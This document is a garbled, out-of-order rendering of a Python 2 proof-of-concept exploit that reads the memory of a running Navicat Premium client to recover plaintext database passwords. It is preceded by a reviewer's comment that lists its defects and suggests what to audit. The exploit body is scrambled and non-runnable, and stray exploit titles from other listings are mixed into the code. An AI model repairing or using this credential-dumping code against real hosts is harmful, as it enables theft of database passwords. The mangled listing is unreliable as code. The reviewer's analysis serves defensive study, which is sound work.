# NOTE(review): this line is a whitespace-mangled, out-of-order rendering of a
# Python 2 PoC (statement-form `print`, `from winappdbg import Debug, Process`).
# The two quoted titles at the start and the `![]()` tokens are page chrome that
# was folded into the listing, not part of the script. Treat it as non-runnable:
# `memory_dump =` has no right-hand side, `for address in process.` is truncated,
# `if found = 0 :` is an assignment where `==` is needed, and in `h2b` the loop
# converts the whole string with `int(str, 16)` instead of the two-character
# slice that the `range(0, len(str), 2)` step implies (presumably a `str[i:i+2]`
# was lost). `process_pid is not 0` compares int identity rather than value, and
# `str`/`bytes` shadow builtins.
# What the header states: the Navicat client keeps the supplied connection
# password in plaintext in its process memory, and the script recovers it by
# attaching to the running navicat.exe with winappdbg's `Debug`/`Process` and
# reading that memory — so it requires code execution and process-open rights on
# the same host as the client.
# Defensive reading: debugger attach / process-memory reads against the client
# are the observable event to audit, and the "Make sure the client is connected
# at least to one database" message suggests the secret is present only while a
# connection is open — TODO confirm against the client, not inferable from here.
"Ksix Zigbee Devices - Playback Protection Bypass (PoC)" "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" split ( "00 " ) if last : count = count + 1 found = 1 print " Password for connection # %d found as %s " % ( count, h2b ( last )) if found = 0 : print " Password not found! Make sure the client is connected at least to one database." else : print " No process found with name ' %s '." % ( filename ) debug. pop ( 0 ) for i in range ( len ( memory_dump )): str = b2h ( memory_dump ) first = str. sleep ( 1 ) print " Trying to read memory for pid # %d " % ( process_pid ) process = Process ( process_pid ) for address in process. get_pid () if process_pid is not 0 : print " Found process with pid # %d " % ( process_pid ) time. find_processes_by_filename ( filename ): process_pid = process. scan_processes () for ( process, process_name ) in debug. ![]() join ( bytes ) debug = Debug () try : print " Searching for pid by process name ' %s '." % ( filename ) time. append ( chr ( int ( str, 16 ))) return ''. split ( " " )) for i in range ( 0, len ( str ), 2 ): bytes. strip () def h2b ( str ): bytes = str = ''. # Proof-Of-Concept Code: # import time from winappdbg import Debug, Process count = 0 found = 0 filename = "navicat.exe" process_pid = 0 memory_dump = def b2h ( str ): return ''. # A potential attacker could reveal the supplied password in order to gain access to the database. ![]() # Navicat Premium 11.2.11 (64bit) Local Password Disclosure # Tested on Windows Windows Server 2012 R2 64bit, English # Vendor Homepage # Date # Bug Discovered by Yakir Wizman () # Special Thanks & Greetings to friend of mine Viktor Minin () | () # Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.